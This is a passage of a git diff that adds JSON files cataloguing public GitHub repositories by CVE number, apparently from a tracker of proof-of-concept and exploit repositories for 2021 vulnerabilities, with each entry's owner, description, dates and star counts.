+ "stargazers_count": 69,
+ "watchers_count": 69,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 69,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 409021883,
+ "name": "CVE-2021-38647",
+ "full_name": "m1thryn\/CVE-2021-38647",
+ "owner": {
+ "login": "m1thryn",
+ "id": 46854424,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46854424?v=4",
+ "html_url": "https:\/\/github.com\/m1thryn"
+ },
+ "html_url": "https:\/\/github.com\/m1thryn\/CVE-2021-38647",
+ "description": "OMIGOD PoC",
+ "fork": false,
+ "created_at": "2021-09-22T01:05:22Z",
+ "updated_at": "2021-09-22T22:40:10Z",
+ "pushed_at": "2021-09-22T22:40:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-38647"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 409255270,
+ "name": "cve-2021-38647",
+ "full_name": "abousteif\/cve-2021-38647",
+ "owner": {
+ "login": "abousteif",
+ "id": 85574781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85574781?v=4",
+ "html_url": "https:\/\/github.com\/abousteif"
+ },
+ "html_url": "https:\/\/github.com\/abousteif\/cve-2021-38647",
+ "description": "https:\/\/github.com\/corelight\/CVE-2021-38647 without the bloat",
+ "fork": false,
+ "created_at": "2021-09-22T15:20:40Z",
+ "updated_at": "2021-09-22T15:29:15Z",
+ "pushed_at": "2021-09-22T15:29:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 409929982,
+ "name": "OMIGOD_cve-2021-38647",
+ "full_name": "Vulnmachines\/OMIGOD_cve-2021-38647",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/OMIGOD_cve-2021-38647",
+ "description": "CVE-2021-38647 is an unauthenticated RCE vulnerability effecting the OMI agent as root.",
+ "fork": false,
+ "created_at": "2021-09-24T10:53:52Z",
+ "updated_at": "2023-09-28T11:31:43Z",
+ "pushed_at": "2022-07-26T05:24:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410625937,
+ "name": "omigod",
+ "full_name": "goofsec\/omigod",
+ "owner": {
+ "login": "goofsec",
+ "id": 12970366,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12970366?v=4",
+ "html_url": "https:\/\/github.com\/goofsec"
+ },
+ "html_url": "https:\/\/github.com\/goofsec\/omigod",
+ "description": "Quick and dirty CVE-2021-38647 (Omigod) exploit written in Go.",
+ "fork": false,
+ "created_at": "2021-09-26T18:06:00Z",
+ "updated_at": "2023-07-05T11:05:54Z",
+ "pushed_at": "2021-09-26T18:12:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 771712163,
+ "name": "CVE-2021-38647-noimages",
+ "full_name": "corelight\/CVE-2021-38647-noimages",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-38647-noimages",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-13T20:05:11Z",
+ "updated_at": "2024-03-13T20:05:25Z",
+ "pushed_at": "2024-03-13T20:05:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38666.json b/2021/CVE-2021-38666.json
new file mode 100644
index 0000000000..c09b76abb9
--- /dev/null
+++ b/2021/CVE-2021-38666.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 427206143,
+ "name": "CVE-2021-38666-poc",
+ "full_name": "DarkSprings\/CVE-2021-38666-poc",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-38666-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-12T02:21:27Z",
+ "updated_at": "2024-04-16T02:40:09Z",
+ "pushed_at": "2021-11-12T02:32:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437242073,
+ "name": "CVE-2021-38666",
+ "full_name": "JaneMandy\/CVE-2021-38666",
+ "owner": {
+ "login": "JaneMandy",
+ "id": 36792635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4",
+ "html_url": "https:\/\/github.com\/JaneMandy"
+ },
+ "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2021-38666",
+ "description": "RDP Client RCE",
+ "fork": false,
+ "created_at": "2021-12-11T09:42:28Z",
+ "updated_at": "2021-12-11T09:42:28Z",
+ "pushed_at": "2021-12-11T09:42:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38699.json b/2021/CVE-2021-38699.json
new file mode 100644
index 0000000000..65f8b2c1d2
--- /dev/null
+++ b/2021/CVE-2021-38699.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 395445004,
+ "name": "CVE-2021-38699-Reflected-XSS",
+ "full_name": "HuskyHacks\/CVE-2021-38699-Reflected-XSS",
+ "owner": {
+ "login": "HuskyHacks",
+ "id": 57866415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4",
+ "html_url": "https:\/\/github.com\/HuskyHacks"
+ },
+ "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38699-Reflected-XSS",
+ "description": "Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS",
+ "fork": false,
+ "created_at": "2021-08-12T21:12:04Z",
+ "updated_at": "2023-11-13T10:18:58Z",
+ "pushed_at": "2021-08-17T01:24:12Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 395458878,
+ "name": "CVE-2021-38699-Stored-XSS",
+ "full_name": "HuskyHacks\/CVE-2021-38699-Stored-XSS",
+ "owner": {
+ "login": "HuskyHacks",
+ "id": 57866415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4",
+ "html_url": "https:\/\/github.com\/HuskyHacks"
+ },
+ "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38699-Stored-XSS",
+ "description": "Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS",
+ "fork": false,
+ "created_at": "2021-08-12T22:32:18Z",
+ "updated_at": "2023-11-13T10:18:48Z",
+ "pushed_at": "2021-08-15T23:33:36Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 396128386,
+ "name": "CVE-2021-38699",
+ "full_name": "Justin-1993\/CVE-2021-38699",
+ "owner": {
+ "login": "Justin-1993",
+ "id": 76507754,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76507754?v=4",
+ "html_url": "https:\/\/github.com\/Justin-1993"
+ },
+ "html_url": "https:\/\/github.com\/Justin-1993\/CVE-2021-38699",
+ "description": "TastyIgniter 3.0.7 allows XSS via the name field during user-account creation",
+ "fork": false,
+ "created_at": "2021-08-14T20:57:00Z",
+ "updated_at": "2023-06-17T06:16:02Z",
+ "pushed_at": "2021-08-15T23:05:47Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38817.json b/2021/CVE-2021-38817.json
new file mode 100644
index 0000000000..5611c36f81
--- /dev/null
+++ b/2021/CVE-2021-38817.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 396189064,
+ "name": "CVE-2021-38817-Remote-OS-Command-Injection",
+ "full_name": "HuskyHacks\/CVE-2021-38817-Remote-OS-Command-Injection",
+ "owner": {
+ "login": "HuskyHacks",
+ "id": 57866415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57866415?v=4",
+ "html_url": "https:\/\/github.com\/HuskyHacks"
+ },
+ "html_url": "https:\/\/github.com\/HuskyHacks\/CVE-2021-38817-Remote-OS-Command-Injection",
+ "description": "Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field",
+ "fork": false,
+ "created_at": "2021-08-15T02:15:54Z",
+ "updated_at": "2023-10-10T13:09:26Z",
+ "pushed_at": "2022-11-08T22:31:37Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38819.json b/2021/CVE-2021-38819.json
new file mode 100644
index 0000000000..1129a9aecd
--- /dev/null
+++ b/2021/CVE-2021-38819.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 563462587,
+ "name": "CVE-2021-38819",
+ "full_name": "m4sk0ff\/CVE-2021-38819",
+ "owner": {
+ "login": "m4sk0ff",
+ "id": 52242756,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52242756?v=4",
+ "html_url": "https:\/\/github.com\/m4sk0ff"
+ },
+ "html_url": "https:\/\/github.com\/m4sk0ff\/CVE-2021-38819",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-08T17:01:41Z",
+ "updated_at": "2023-01-18T09:18:41Z",
+ "pushed_at": "2022-11-08T17:15:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3899.json b/2021/CVE-2021-3899.json
new file mode 100644
index 0000000000..4e29048463
--- /dev/null
+++ b/2021/CVE-2021-3899.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 494653757,
+ "name": "CVE-2021-3899_PoC",
+ "full_name": "liumuqing\/CVE-2021-3899_PoC",
+ "owner": {
+ "login": "liumuqing",
+ "id": 1625020,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1625020?v=4",
+ "html_url": "https:\/\/github.com\/liumuqing"
+ },
+ "html_url": "https:\/\/github.com\/liumuqing\/CVE-2021-3899_PoC",
+ "description": "race condition in apport lead to Local Privilege Escalation on Ubuntu",
+ "fork": false,
+ "created_at": "2022-05-21T01:52:34Z",
+ "updated_at": "2023-05-08T12:33:32Z",
+ "pushed_at": "2022-06-08T07:16:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39115.json b/2021/CVE-2021-39115.json
new file mode 100644
index 0000000000..dd0bb755ef
--- /dev/null
+++ b/2021/CVE-2021-39115.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 403911311,
+ "name": "CVE-2021-39115",
+ "full_name": "PetrusViet\/CVE-2021-39115",
+ "owner": {
+ "login": "PetrusViet",
+ "id": 63145078,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4",
+ "html_url": "https:\/\/github.com\/PetrusViet"
+ },
+ "html_url": "https:\/\/github.com\/PetrusViet\/CVE-2021-39115",
+ "description": "Template Injection in Email Templates leads to code execution on Jira Service Management Server",
+ "fork": false,
+ "created_at": "2021-09-07T09:03:35Z",
+ "updated_at": "2024-05-15T19:14:10Z",
+ "pushed_at": "2021-09-09T03:58:32Z",
+ "stargazers_count": 49,
+ "watchers_count": 49,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 49,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39141.json b/2021/CVE-2021-39141.json
new file mode 100644
index 0000000000..1adf598adf
--- /dev/null
+++ b/2021/CVE-2021-39141.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 399355993,
+ "name": "Xstream-1.4.17",
+ "full_name": "zwjjustdoit\/Xstream-1.4.17",
+ "owner": {
+ "login": "zwjjustdoit",
+ "id": 50495555,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4",
+ "html_url": "https:\/\/github.com\/zwjjustdoit"
+ },
+ "html_url": "https:\/\/github.com\/zwjjustdoit\/Xstream-1.4.17",
+ "description": "XSTREAM<=1.4.17漏洞复现(CVE-2021-39141、CVE-2021-39144、CVE-2021-39150)",
+ "fork": false,
+ "created_at": "2021-08-24T06:15:20Z",
+ "updated_at": "2023-12-28T02:24:56Z",
+ "pushed_at": "2021-08-25T02:00:12Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39165.json b/2021/CVE-2021-39165.json
new file mode 100644
index 0000000000..6488b1b6f9
--- /dev/null
+++ b/2021/CVE-2021-39165.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 470280427,
+ "name": "CVE-2021-39165",
+ "full_name": "W0rty\/CVE-2021-39165",
+ "owner": {
+ "login": "W0rty",
+ "id": 63255997,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63255997?v=4",
+ "html_url": "https:\/\/github.com\/W0rty"
+ },
+ "html_url": "https:\/\/github.com\/W0rty\/CVE-2021-39165",
+ "description": "Github repository which contains a functional exploit for CVE-2021-39165",
+ "fork": false,
+ "created_at": "2022-03-15T18:14:46Z",
+ "updated_at": "2023-09-28T11:37:04Z",
+ "pushed_at": "2022-07-13T09:39:13Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cachet",
+ "php",
+ "sqli"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 694381126,
+ "name": "CVE-2021-39165",
+ "full_name": "manbolq\/CVE-2021-39165",
+ "owner": {
+ "login": "manbolq",
+ "id": 65337905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65337905?v=4",
+ "html_url": "https:\/\/github.com\/manbolq"
+ },
+ "html_url": "https:\/\/github.com\/manbolq\/CVE-2021-39165",
+ "description": "Python3 POC for CVE-2021-39165 in CachetHQ",
+ "fork": false,
+ "created_at": "2023-09-20T22:19:55Z",
+ "updated_at": "2023-09-20T22:25:16Z",
+ "pushed_at": "2023-10-19T09:55:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39172.json b/2021/CVE-2021-39172.json
new file mode 100644
index 0000000000..09760a39df
--- /dev/null
+++ b/2021/CVE-2021-39172.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 537739277,
+ "name": "CVE-2021-39172-RCE",
+ "full_name": "W1ngLess\/CVE-2021-39172-RCE",
+ "owner": {
+ "login": "W1ngLess",
+ "id": 113761216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113761216?v=4",
+ "html_url": "https:\/\/github.com\/W1ngLess"
+ },
+ "html_url": "https:\/\/github.com\/W1ngLess\/CVE-2021-39172-RCE",
+ "description": "Cachet 2.4 Code Execution via Laravel Configuration Injection CVE-2021-39172",
+ "fork": false,
+ "created_at": "2022-09-17T07:58:33Z",
+ "updated_at": "2023-11-25T10:04:49Z",
+ "pushed_at": "2023-03-27T00:37:51Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cachet-2-4",
+ "cve-2021-39172",
+ "exploit",
+ "laravel",
+ "python3",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39174.json b/2021/CVE-2021-39174.json
new file mode 100644
index 0000000000..1b76fec423
--- /dev/null
+++ b/2021/CVE-2021-39174.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 488350819,
+ "name": "CVE-2021-39174-PoC",
+ "full_name": "n0kovo\/CVE-2021-39174-PoC",
+ "owner": {
+ "login": "n0kovo",
+ "id": 16690056,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16690056?v=4",
+ "html_url": "https:\/\/github.com\/n0kovo"
+ },
+ "html_url": "https:\/\/github.com\/n0kovo\/CVE-2021-39174-PoC",
+ "description": "Cachet configuration leak dumper. CVE-2021-39174 PoC.",
+ "fork": false,
+ "created_at": "2022-05-03T20:17:23Z",
+ "updated_at": "2024-05-29T09:14:17Z",
+ "pushed_at": "2022-05-03T20:17:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 505899527,
+ "name": "cachet_2.4.0-dev",
+ "full_name": "hadrian3689\/cachet_2.4.0-dev",
+ "owner": {
+ "login": "hadrian3689",
+ "id": 71423134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4",
+ "html_url": "https:\/\/github.com\/hadrian3689"
+ },
+ "html_url": "https:\/\/github.com\/hadrian3689\/cachet_2.4.0-dev",
+ "description": "CVE-2021-39174 Cachet 2.4.0-dev",
+ "fork": false,
+ "created_at": "2022-06-21T15:25:09Z",
+ "updated_at": "2023-01-03T01:56:50Z",
+ "pushed_at": "2022-09-20T15:31:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39273.json b/2021/CVE-2021-39273.json
new file mode 100644
index 0000000000..9b827bb599
--- /dev/null
+++ b/2021/CVE-2021-39273.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397312292,
+ "name": "CVE-2021-39273-CVE-2021-39274",
+ "full_name": "nikip72\/CVE-2021-39273-CVE-2021-39274",
+ "owner": {
+ "login": "nikip72",
+ "id": 49496243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49496243?v=4",
+ "html_url": "https:\/\/github.com\/nikip72"
+ },
+ "html_url": "https:\/\/github.com\/nikip72\/CVE-2021-39273-CVE-2021-39274",
+ "description": "Two security issues identified in Sn1per v9.0 free version by XeroSecurity",
+ "fork": false,
+ "created_at": "2021-08-17T15:50:48Z",
+ "updated_at": "2021-08-22T12:05:10Z",
+ "pushed_at": "2021-08-18T07:57:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39287.json b/2021/CVE-2021-39287.json
new file mode 100644
index 0000000000..cf473f82c1
--- /dev/null
+++ b/2021/CVE-2021-39287.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397072152,
+ "name": "CVE-2021-39287-Stored-XSS",
+ "full_name": "Fearless523\/CVE-2021-39287-Stored-XSS",
+ "owner": {
+ "login": "Fearless523",
+ "id": 56332039,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56332039?v=4",
+ "html_url": "https:\/\/github.com\/Fearless523"
+ },
+ "html_url": "https:\/\/github.com\/Fearless523\/CVE-2021-39287-Stored-XSS",
+ "description": "CVE-TBD Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS",
+ "fork": false,
+ "created_at": "2021-08-17T03:01:38Z",
+ "updated_at": "2023-09-28T11:30:37Z",
+ "pushed_at": "2021-08-19T01:36:20Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3929.json b/2021/CVE-2021-3929.json
new file mode 100644
index 0000000000..d7944349e2
--- /dev/null
+++ b/2021/CVE-2021-3929.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 491769512,
+ "name": "CVE-2021-3929-3947",
+ "full_name": "QiuhaoLi\/CVE-2021-3929-3947",
+ "owner": {
+ "login": "QiuhaoLi",
+ "id": 45557084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45557084?v=4",
+ "html_url": "https:\/\/github.com\/QiuhaoLi"
+ },
+ "html_url": "https:\/\/github.com\/QiuhaoLi\/CVE-2021-3929-3947",
+ "description": "Recursive MMIO VM Escape PoC",
+ "fork": false,
+ "created_at": "2022-05-13T05:33:28Z",
+ "updated_at": "2024-06-08T02:37:04Z",
+ "pushed_at": "2022-05-13T05:37:41Z",
+ "stargazers_count": 161,
+ "watchers_count": 161,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 161,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39377.json b/2021/CVE-2021-39377.json
new file mode 100644
index 0000000000..53e362d782
--- /dev/null
+++ b/2021/CVE-2021-39377.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397483539,
+ "name": "CVE-2021-39377",
+ "full_name": "security-n\/CVE-2021-39377",
+ "owner": {
+ "login": "security-n",
+ "id": 88956475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4",
+ "html_url": "https:\/\/github.com\/security-n"
+ },
+ "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39377",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-18T05:29:15Z",
+ "updated_at": "2021-08-26T04:35:34Z",
+ "pushed_at": "2021-08-23T05:28:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39378.json b/2021/CVE-2021-39378.json
new file mode 100644
index 0000000000..6d968de723
--- /dev/null
+++ b/2021/CVE-2021-39378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397781159,
+ "name": "CVE-2021-39378",
+ "full_name": "security-n\/CVE-2021-39378",
+ "owner": {
+ "login": "security-n",
+ "id": 88956475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4",
+ "html_url": "https:\/\/github.com\/security-n"
+ },
+ "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39378",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-19T01:32:49Z",
+ "updated_at": "2021-08-26T04:40:46Z",
+ "pushed_at": "2021-08-23T05:27:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39379.json b/2021/CVE-2021-39379.json
new file mode 100644
index 0000000000..9fdd7b1aaf
--- /dev/null
+++ b/2021/CVE-2021-39379.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397817080,
+ "name": "CVE-2021-39379",
+ "full_name": "security-n\/CVE-2021-39379",
+ "owner": {
+ "login": "security-n",
+ "id": 88956475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88956475?v=4",
+ "html_url": "https:\/\/github.com\/security-n"
+ },
+ "html_url": "https:\/\/github.com\/security-n\/CVE-2021-39379",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-19T04:35:53Z",
+ "updated_at": "2021-08-26T04:44:03Z",
+ "pushed_at": "2021-08-23T05:26:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-39408.json b/2021/CVE-2021-39408.json
new file mode 100644
index 0000000000..641a1cce5f
--- /dev/null
+++ b/2021/CVE-2021-39408.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397327413,
+ "name": "CVE-2021-39408",
+ "full_name": "StefanDorresteijn\/CVE-2021-39408",
+ "owner": {
+ "login": "StefanDorresteijn",
+ "id": 2564735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2564735?v=4",
+ "html_url": "https:\/\/github.com\/StefanDorresteijn"
+ },
+ "html_url": "https:\/\/github.com\/StefanDorresteijn\/CVE-2021-39408",
